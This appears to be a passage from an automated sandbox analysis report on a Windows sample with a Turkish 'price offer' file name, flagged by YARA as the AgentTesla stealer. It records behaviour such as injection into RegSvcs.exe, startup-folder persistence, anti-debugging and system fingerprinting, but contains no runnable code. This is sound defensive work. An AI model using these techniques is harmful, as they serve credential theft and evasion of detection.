Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_0101D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	6_2_0101D076
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_0101D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	6_2_0101D3A9
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_0102979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	6_2_0102979D
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_01029642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	6_2_01029642
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_01029B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	6_2_01029B2B
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_01025C97 FindFirstFileW,FindNextFileW,FindClose,	6_2_01025C97

Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe

Code function: 0_2_009842DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_009842DE

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 99875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 99765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 99656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 99546	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 99437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 99328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 99218	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 99109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 99000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 98890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 98781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 98672	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 98560	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 98437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 98328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 98218	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 98109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 97985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 97875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 97765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 97656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 97546	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 97437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 97327	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 97203	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 97093	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 96984	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 96874	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 96765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 96656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 96546	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 96437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 96328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 96218	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 96109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 96000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 99863	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 99726	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 99624	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 99515	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 99313	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 99201	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 99093	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 98984	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 97509	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 97406	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 97297	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 97172	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 99875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 99766	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 99656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 99547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 99437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 99328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 99218	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 99109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 98994	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 98891	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 98781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 98672	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 98562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 98453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 98344	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 98234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 98125	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 98016	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 97906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 97797	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 97687	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 97578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 97469	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 97359	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 97250	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 97141	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 99937	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 99827	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 99719	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 99609	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 99488	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 99359	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 99250	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 99140	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 99031	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 98922	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 98812	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 98703	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 98594	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 98469	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 98359	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 98250	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 98140	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 98020	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 97891	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 97766	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 97656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 97547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 97437	Jump to behavior

Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\	Jump to behavior

Source: RegSvcs.exe, 00000007.00000002.3837231570.0000000002C7A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.4571149713.000000000377A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: HGFS)
Source: RegSvcs.exe, 00000007.00000002.3839733441.000000000518E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: RegSvcs.exe, 0000000B.00000002.4574968955.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll$

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe

Code function: 0_2_009FEAA2 BlockInput,

0_2_009FEAA2

Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe

Code function: 0_2_009B2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_009B2622

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

7_2_004019F0

Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe

Code function: 0_2_009842DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_009842DE

Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe	Code function: 0_2_009A4CE8 mov eax, dword ptr fs:[00000030h]	0_2_009A4CE8
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe	Code function: 0_2_02353550 mov eax, dword ptr fs:[00000030h]	0_2_02353550
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe	Code function: 0_2_023535B0 mov eax, dword ptr fs:[00000030h]	0_2_023535B0
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe	Code function: 0_2_02351ED0 mov eax, dword ptr fs:[00000030h]	0_2_02351ED0
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_00FD4CE8 mov eax, dword ptr fs:[00000030h]	6_2_00FD4CE8
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_00FA35B0 mov eax, dword ptr fs:[00000030h]	6_2_00FA35B0
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_00FA3550 mov eax, dword ptr fs:[00000030h]	6_2_00FA3550
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_00FA1ED0 mov eax, dword ptr fs:[00000030h]	6_2_00FA1ED0
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 10_2_011635B0 mov eax, dword ptr fs:[00000030h]	10_2_011635B0
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 10_2_01163550 mov eax, dword ptr fs:[00000030h]	10_2_01163550
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 10_2_01161ED0 mov eax, dword ptr fs:[00000030h]	10_2_01161ED0

Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe

Code function: 0_2_009E0B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

0_2_009E0B62

Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe	Code function: 0_2_009B2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_009B2622
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe	Code function: 0_2_009A083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_009A083F
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe	Code function: 0_2_009A09D5 SetUnhandledExceptionFilter,	0_2_009A09D5
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe	Code function: 0_2_009A0C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_009A0C21
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_00FE2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_00FE2622
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_00FD083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_00FD083F
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_00FD09D5 SetUnhandledExceptionFilter,	6_2_00FD09D5
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_00FD0C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	6_2_00FD0C21
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_2_0040CE09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_2_0040E61C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_00416F6A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_004123F1 SetUnhandledExceptionFilter,	7_2_004123F1

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write			Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\directory\name.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 90D008			Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 10A0008			Jump to behavior

Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe

0_2_009E1201

Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe

Code function: 0_2_009C2BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_009C2BA5

Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe

Code function: 0_2_009EB226 SendInput,keybd_event,

0_2_009EB226

Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe

Code function: 0_2_00A022DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,

0_2_00A022DA

Source: C:\Users\user\AppData\Local\directory\name.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Local\directory\name.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\directory\name.exe"	Jump to behavior

Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe

0_2_009E0B62

Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe

Code function: 0_2_009E1663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_009E1663

Source: F#U0130YAT TEKL#U0130F.exe, name.exe.0.dr	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: F#U0130YAT TEKL#U0130F.exe, name.exe	Binary or memory string: Shell_TrayWnd

Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe

Code function: 0_2_009A0698 cpuid

0_2_009A0698

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: GetLocaleInfoA,

7_2_00417A20

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe

Code function: 0_2_009F8195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,

0_2_009F8195

Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe

Code function: 0_2_009DD27A GetUserNameW,

0_2_009DD27A

Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe

Code function: 0_2_009BB952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

0_2_009BB952

Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe

Code function: 0_2_009842DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_009842DE

Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 7.2.RegSvcs.exe.2ae0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.2ae0ee8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.274f4de.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.3b46458.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.3b93d90.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.274f4de.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.3b93d90.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.5240000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.2ae0ee8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.27503c6.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.3b46458.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.5240000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.3b45570.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.3b45570.7.raw.unpack, type: UNPACKEDPE
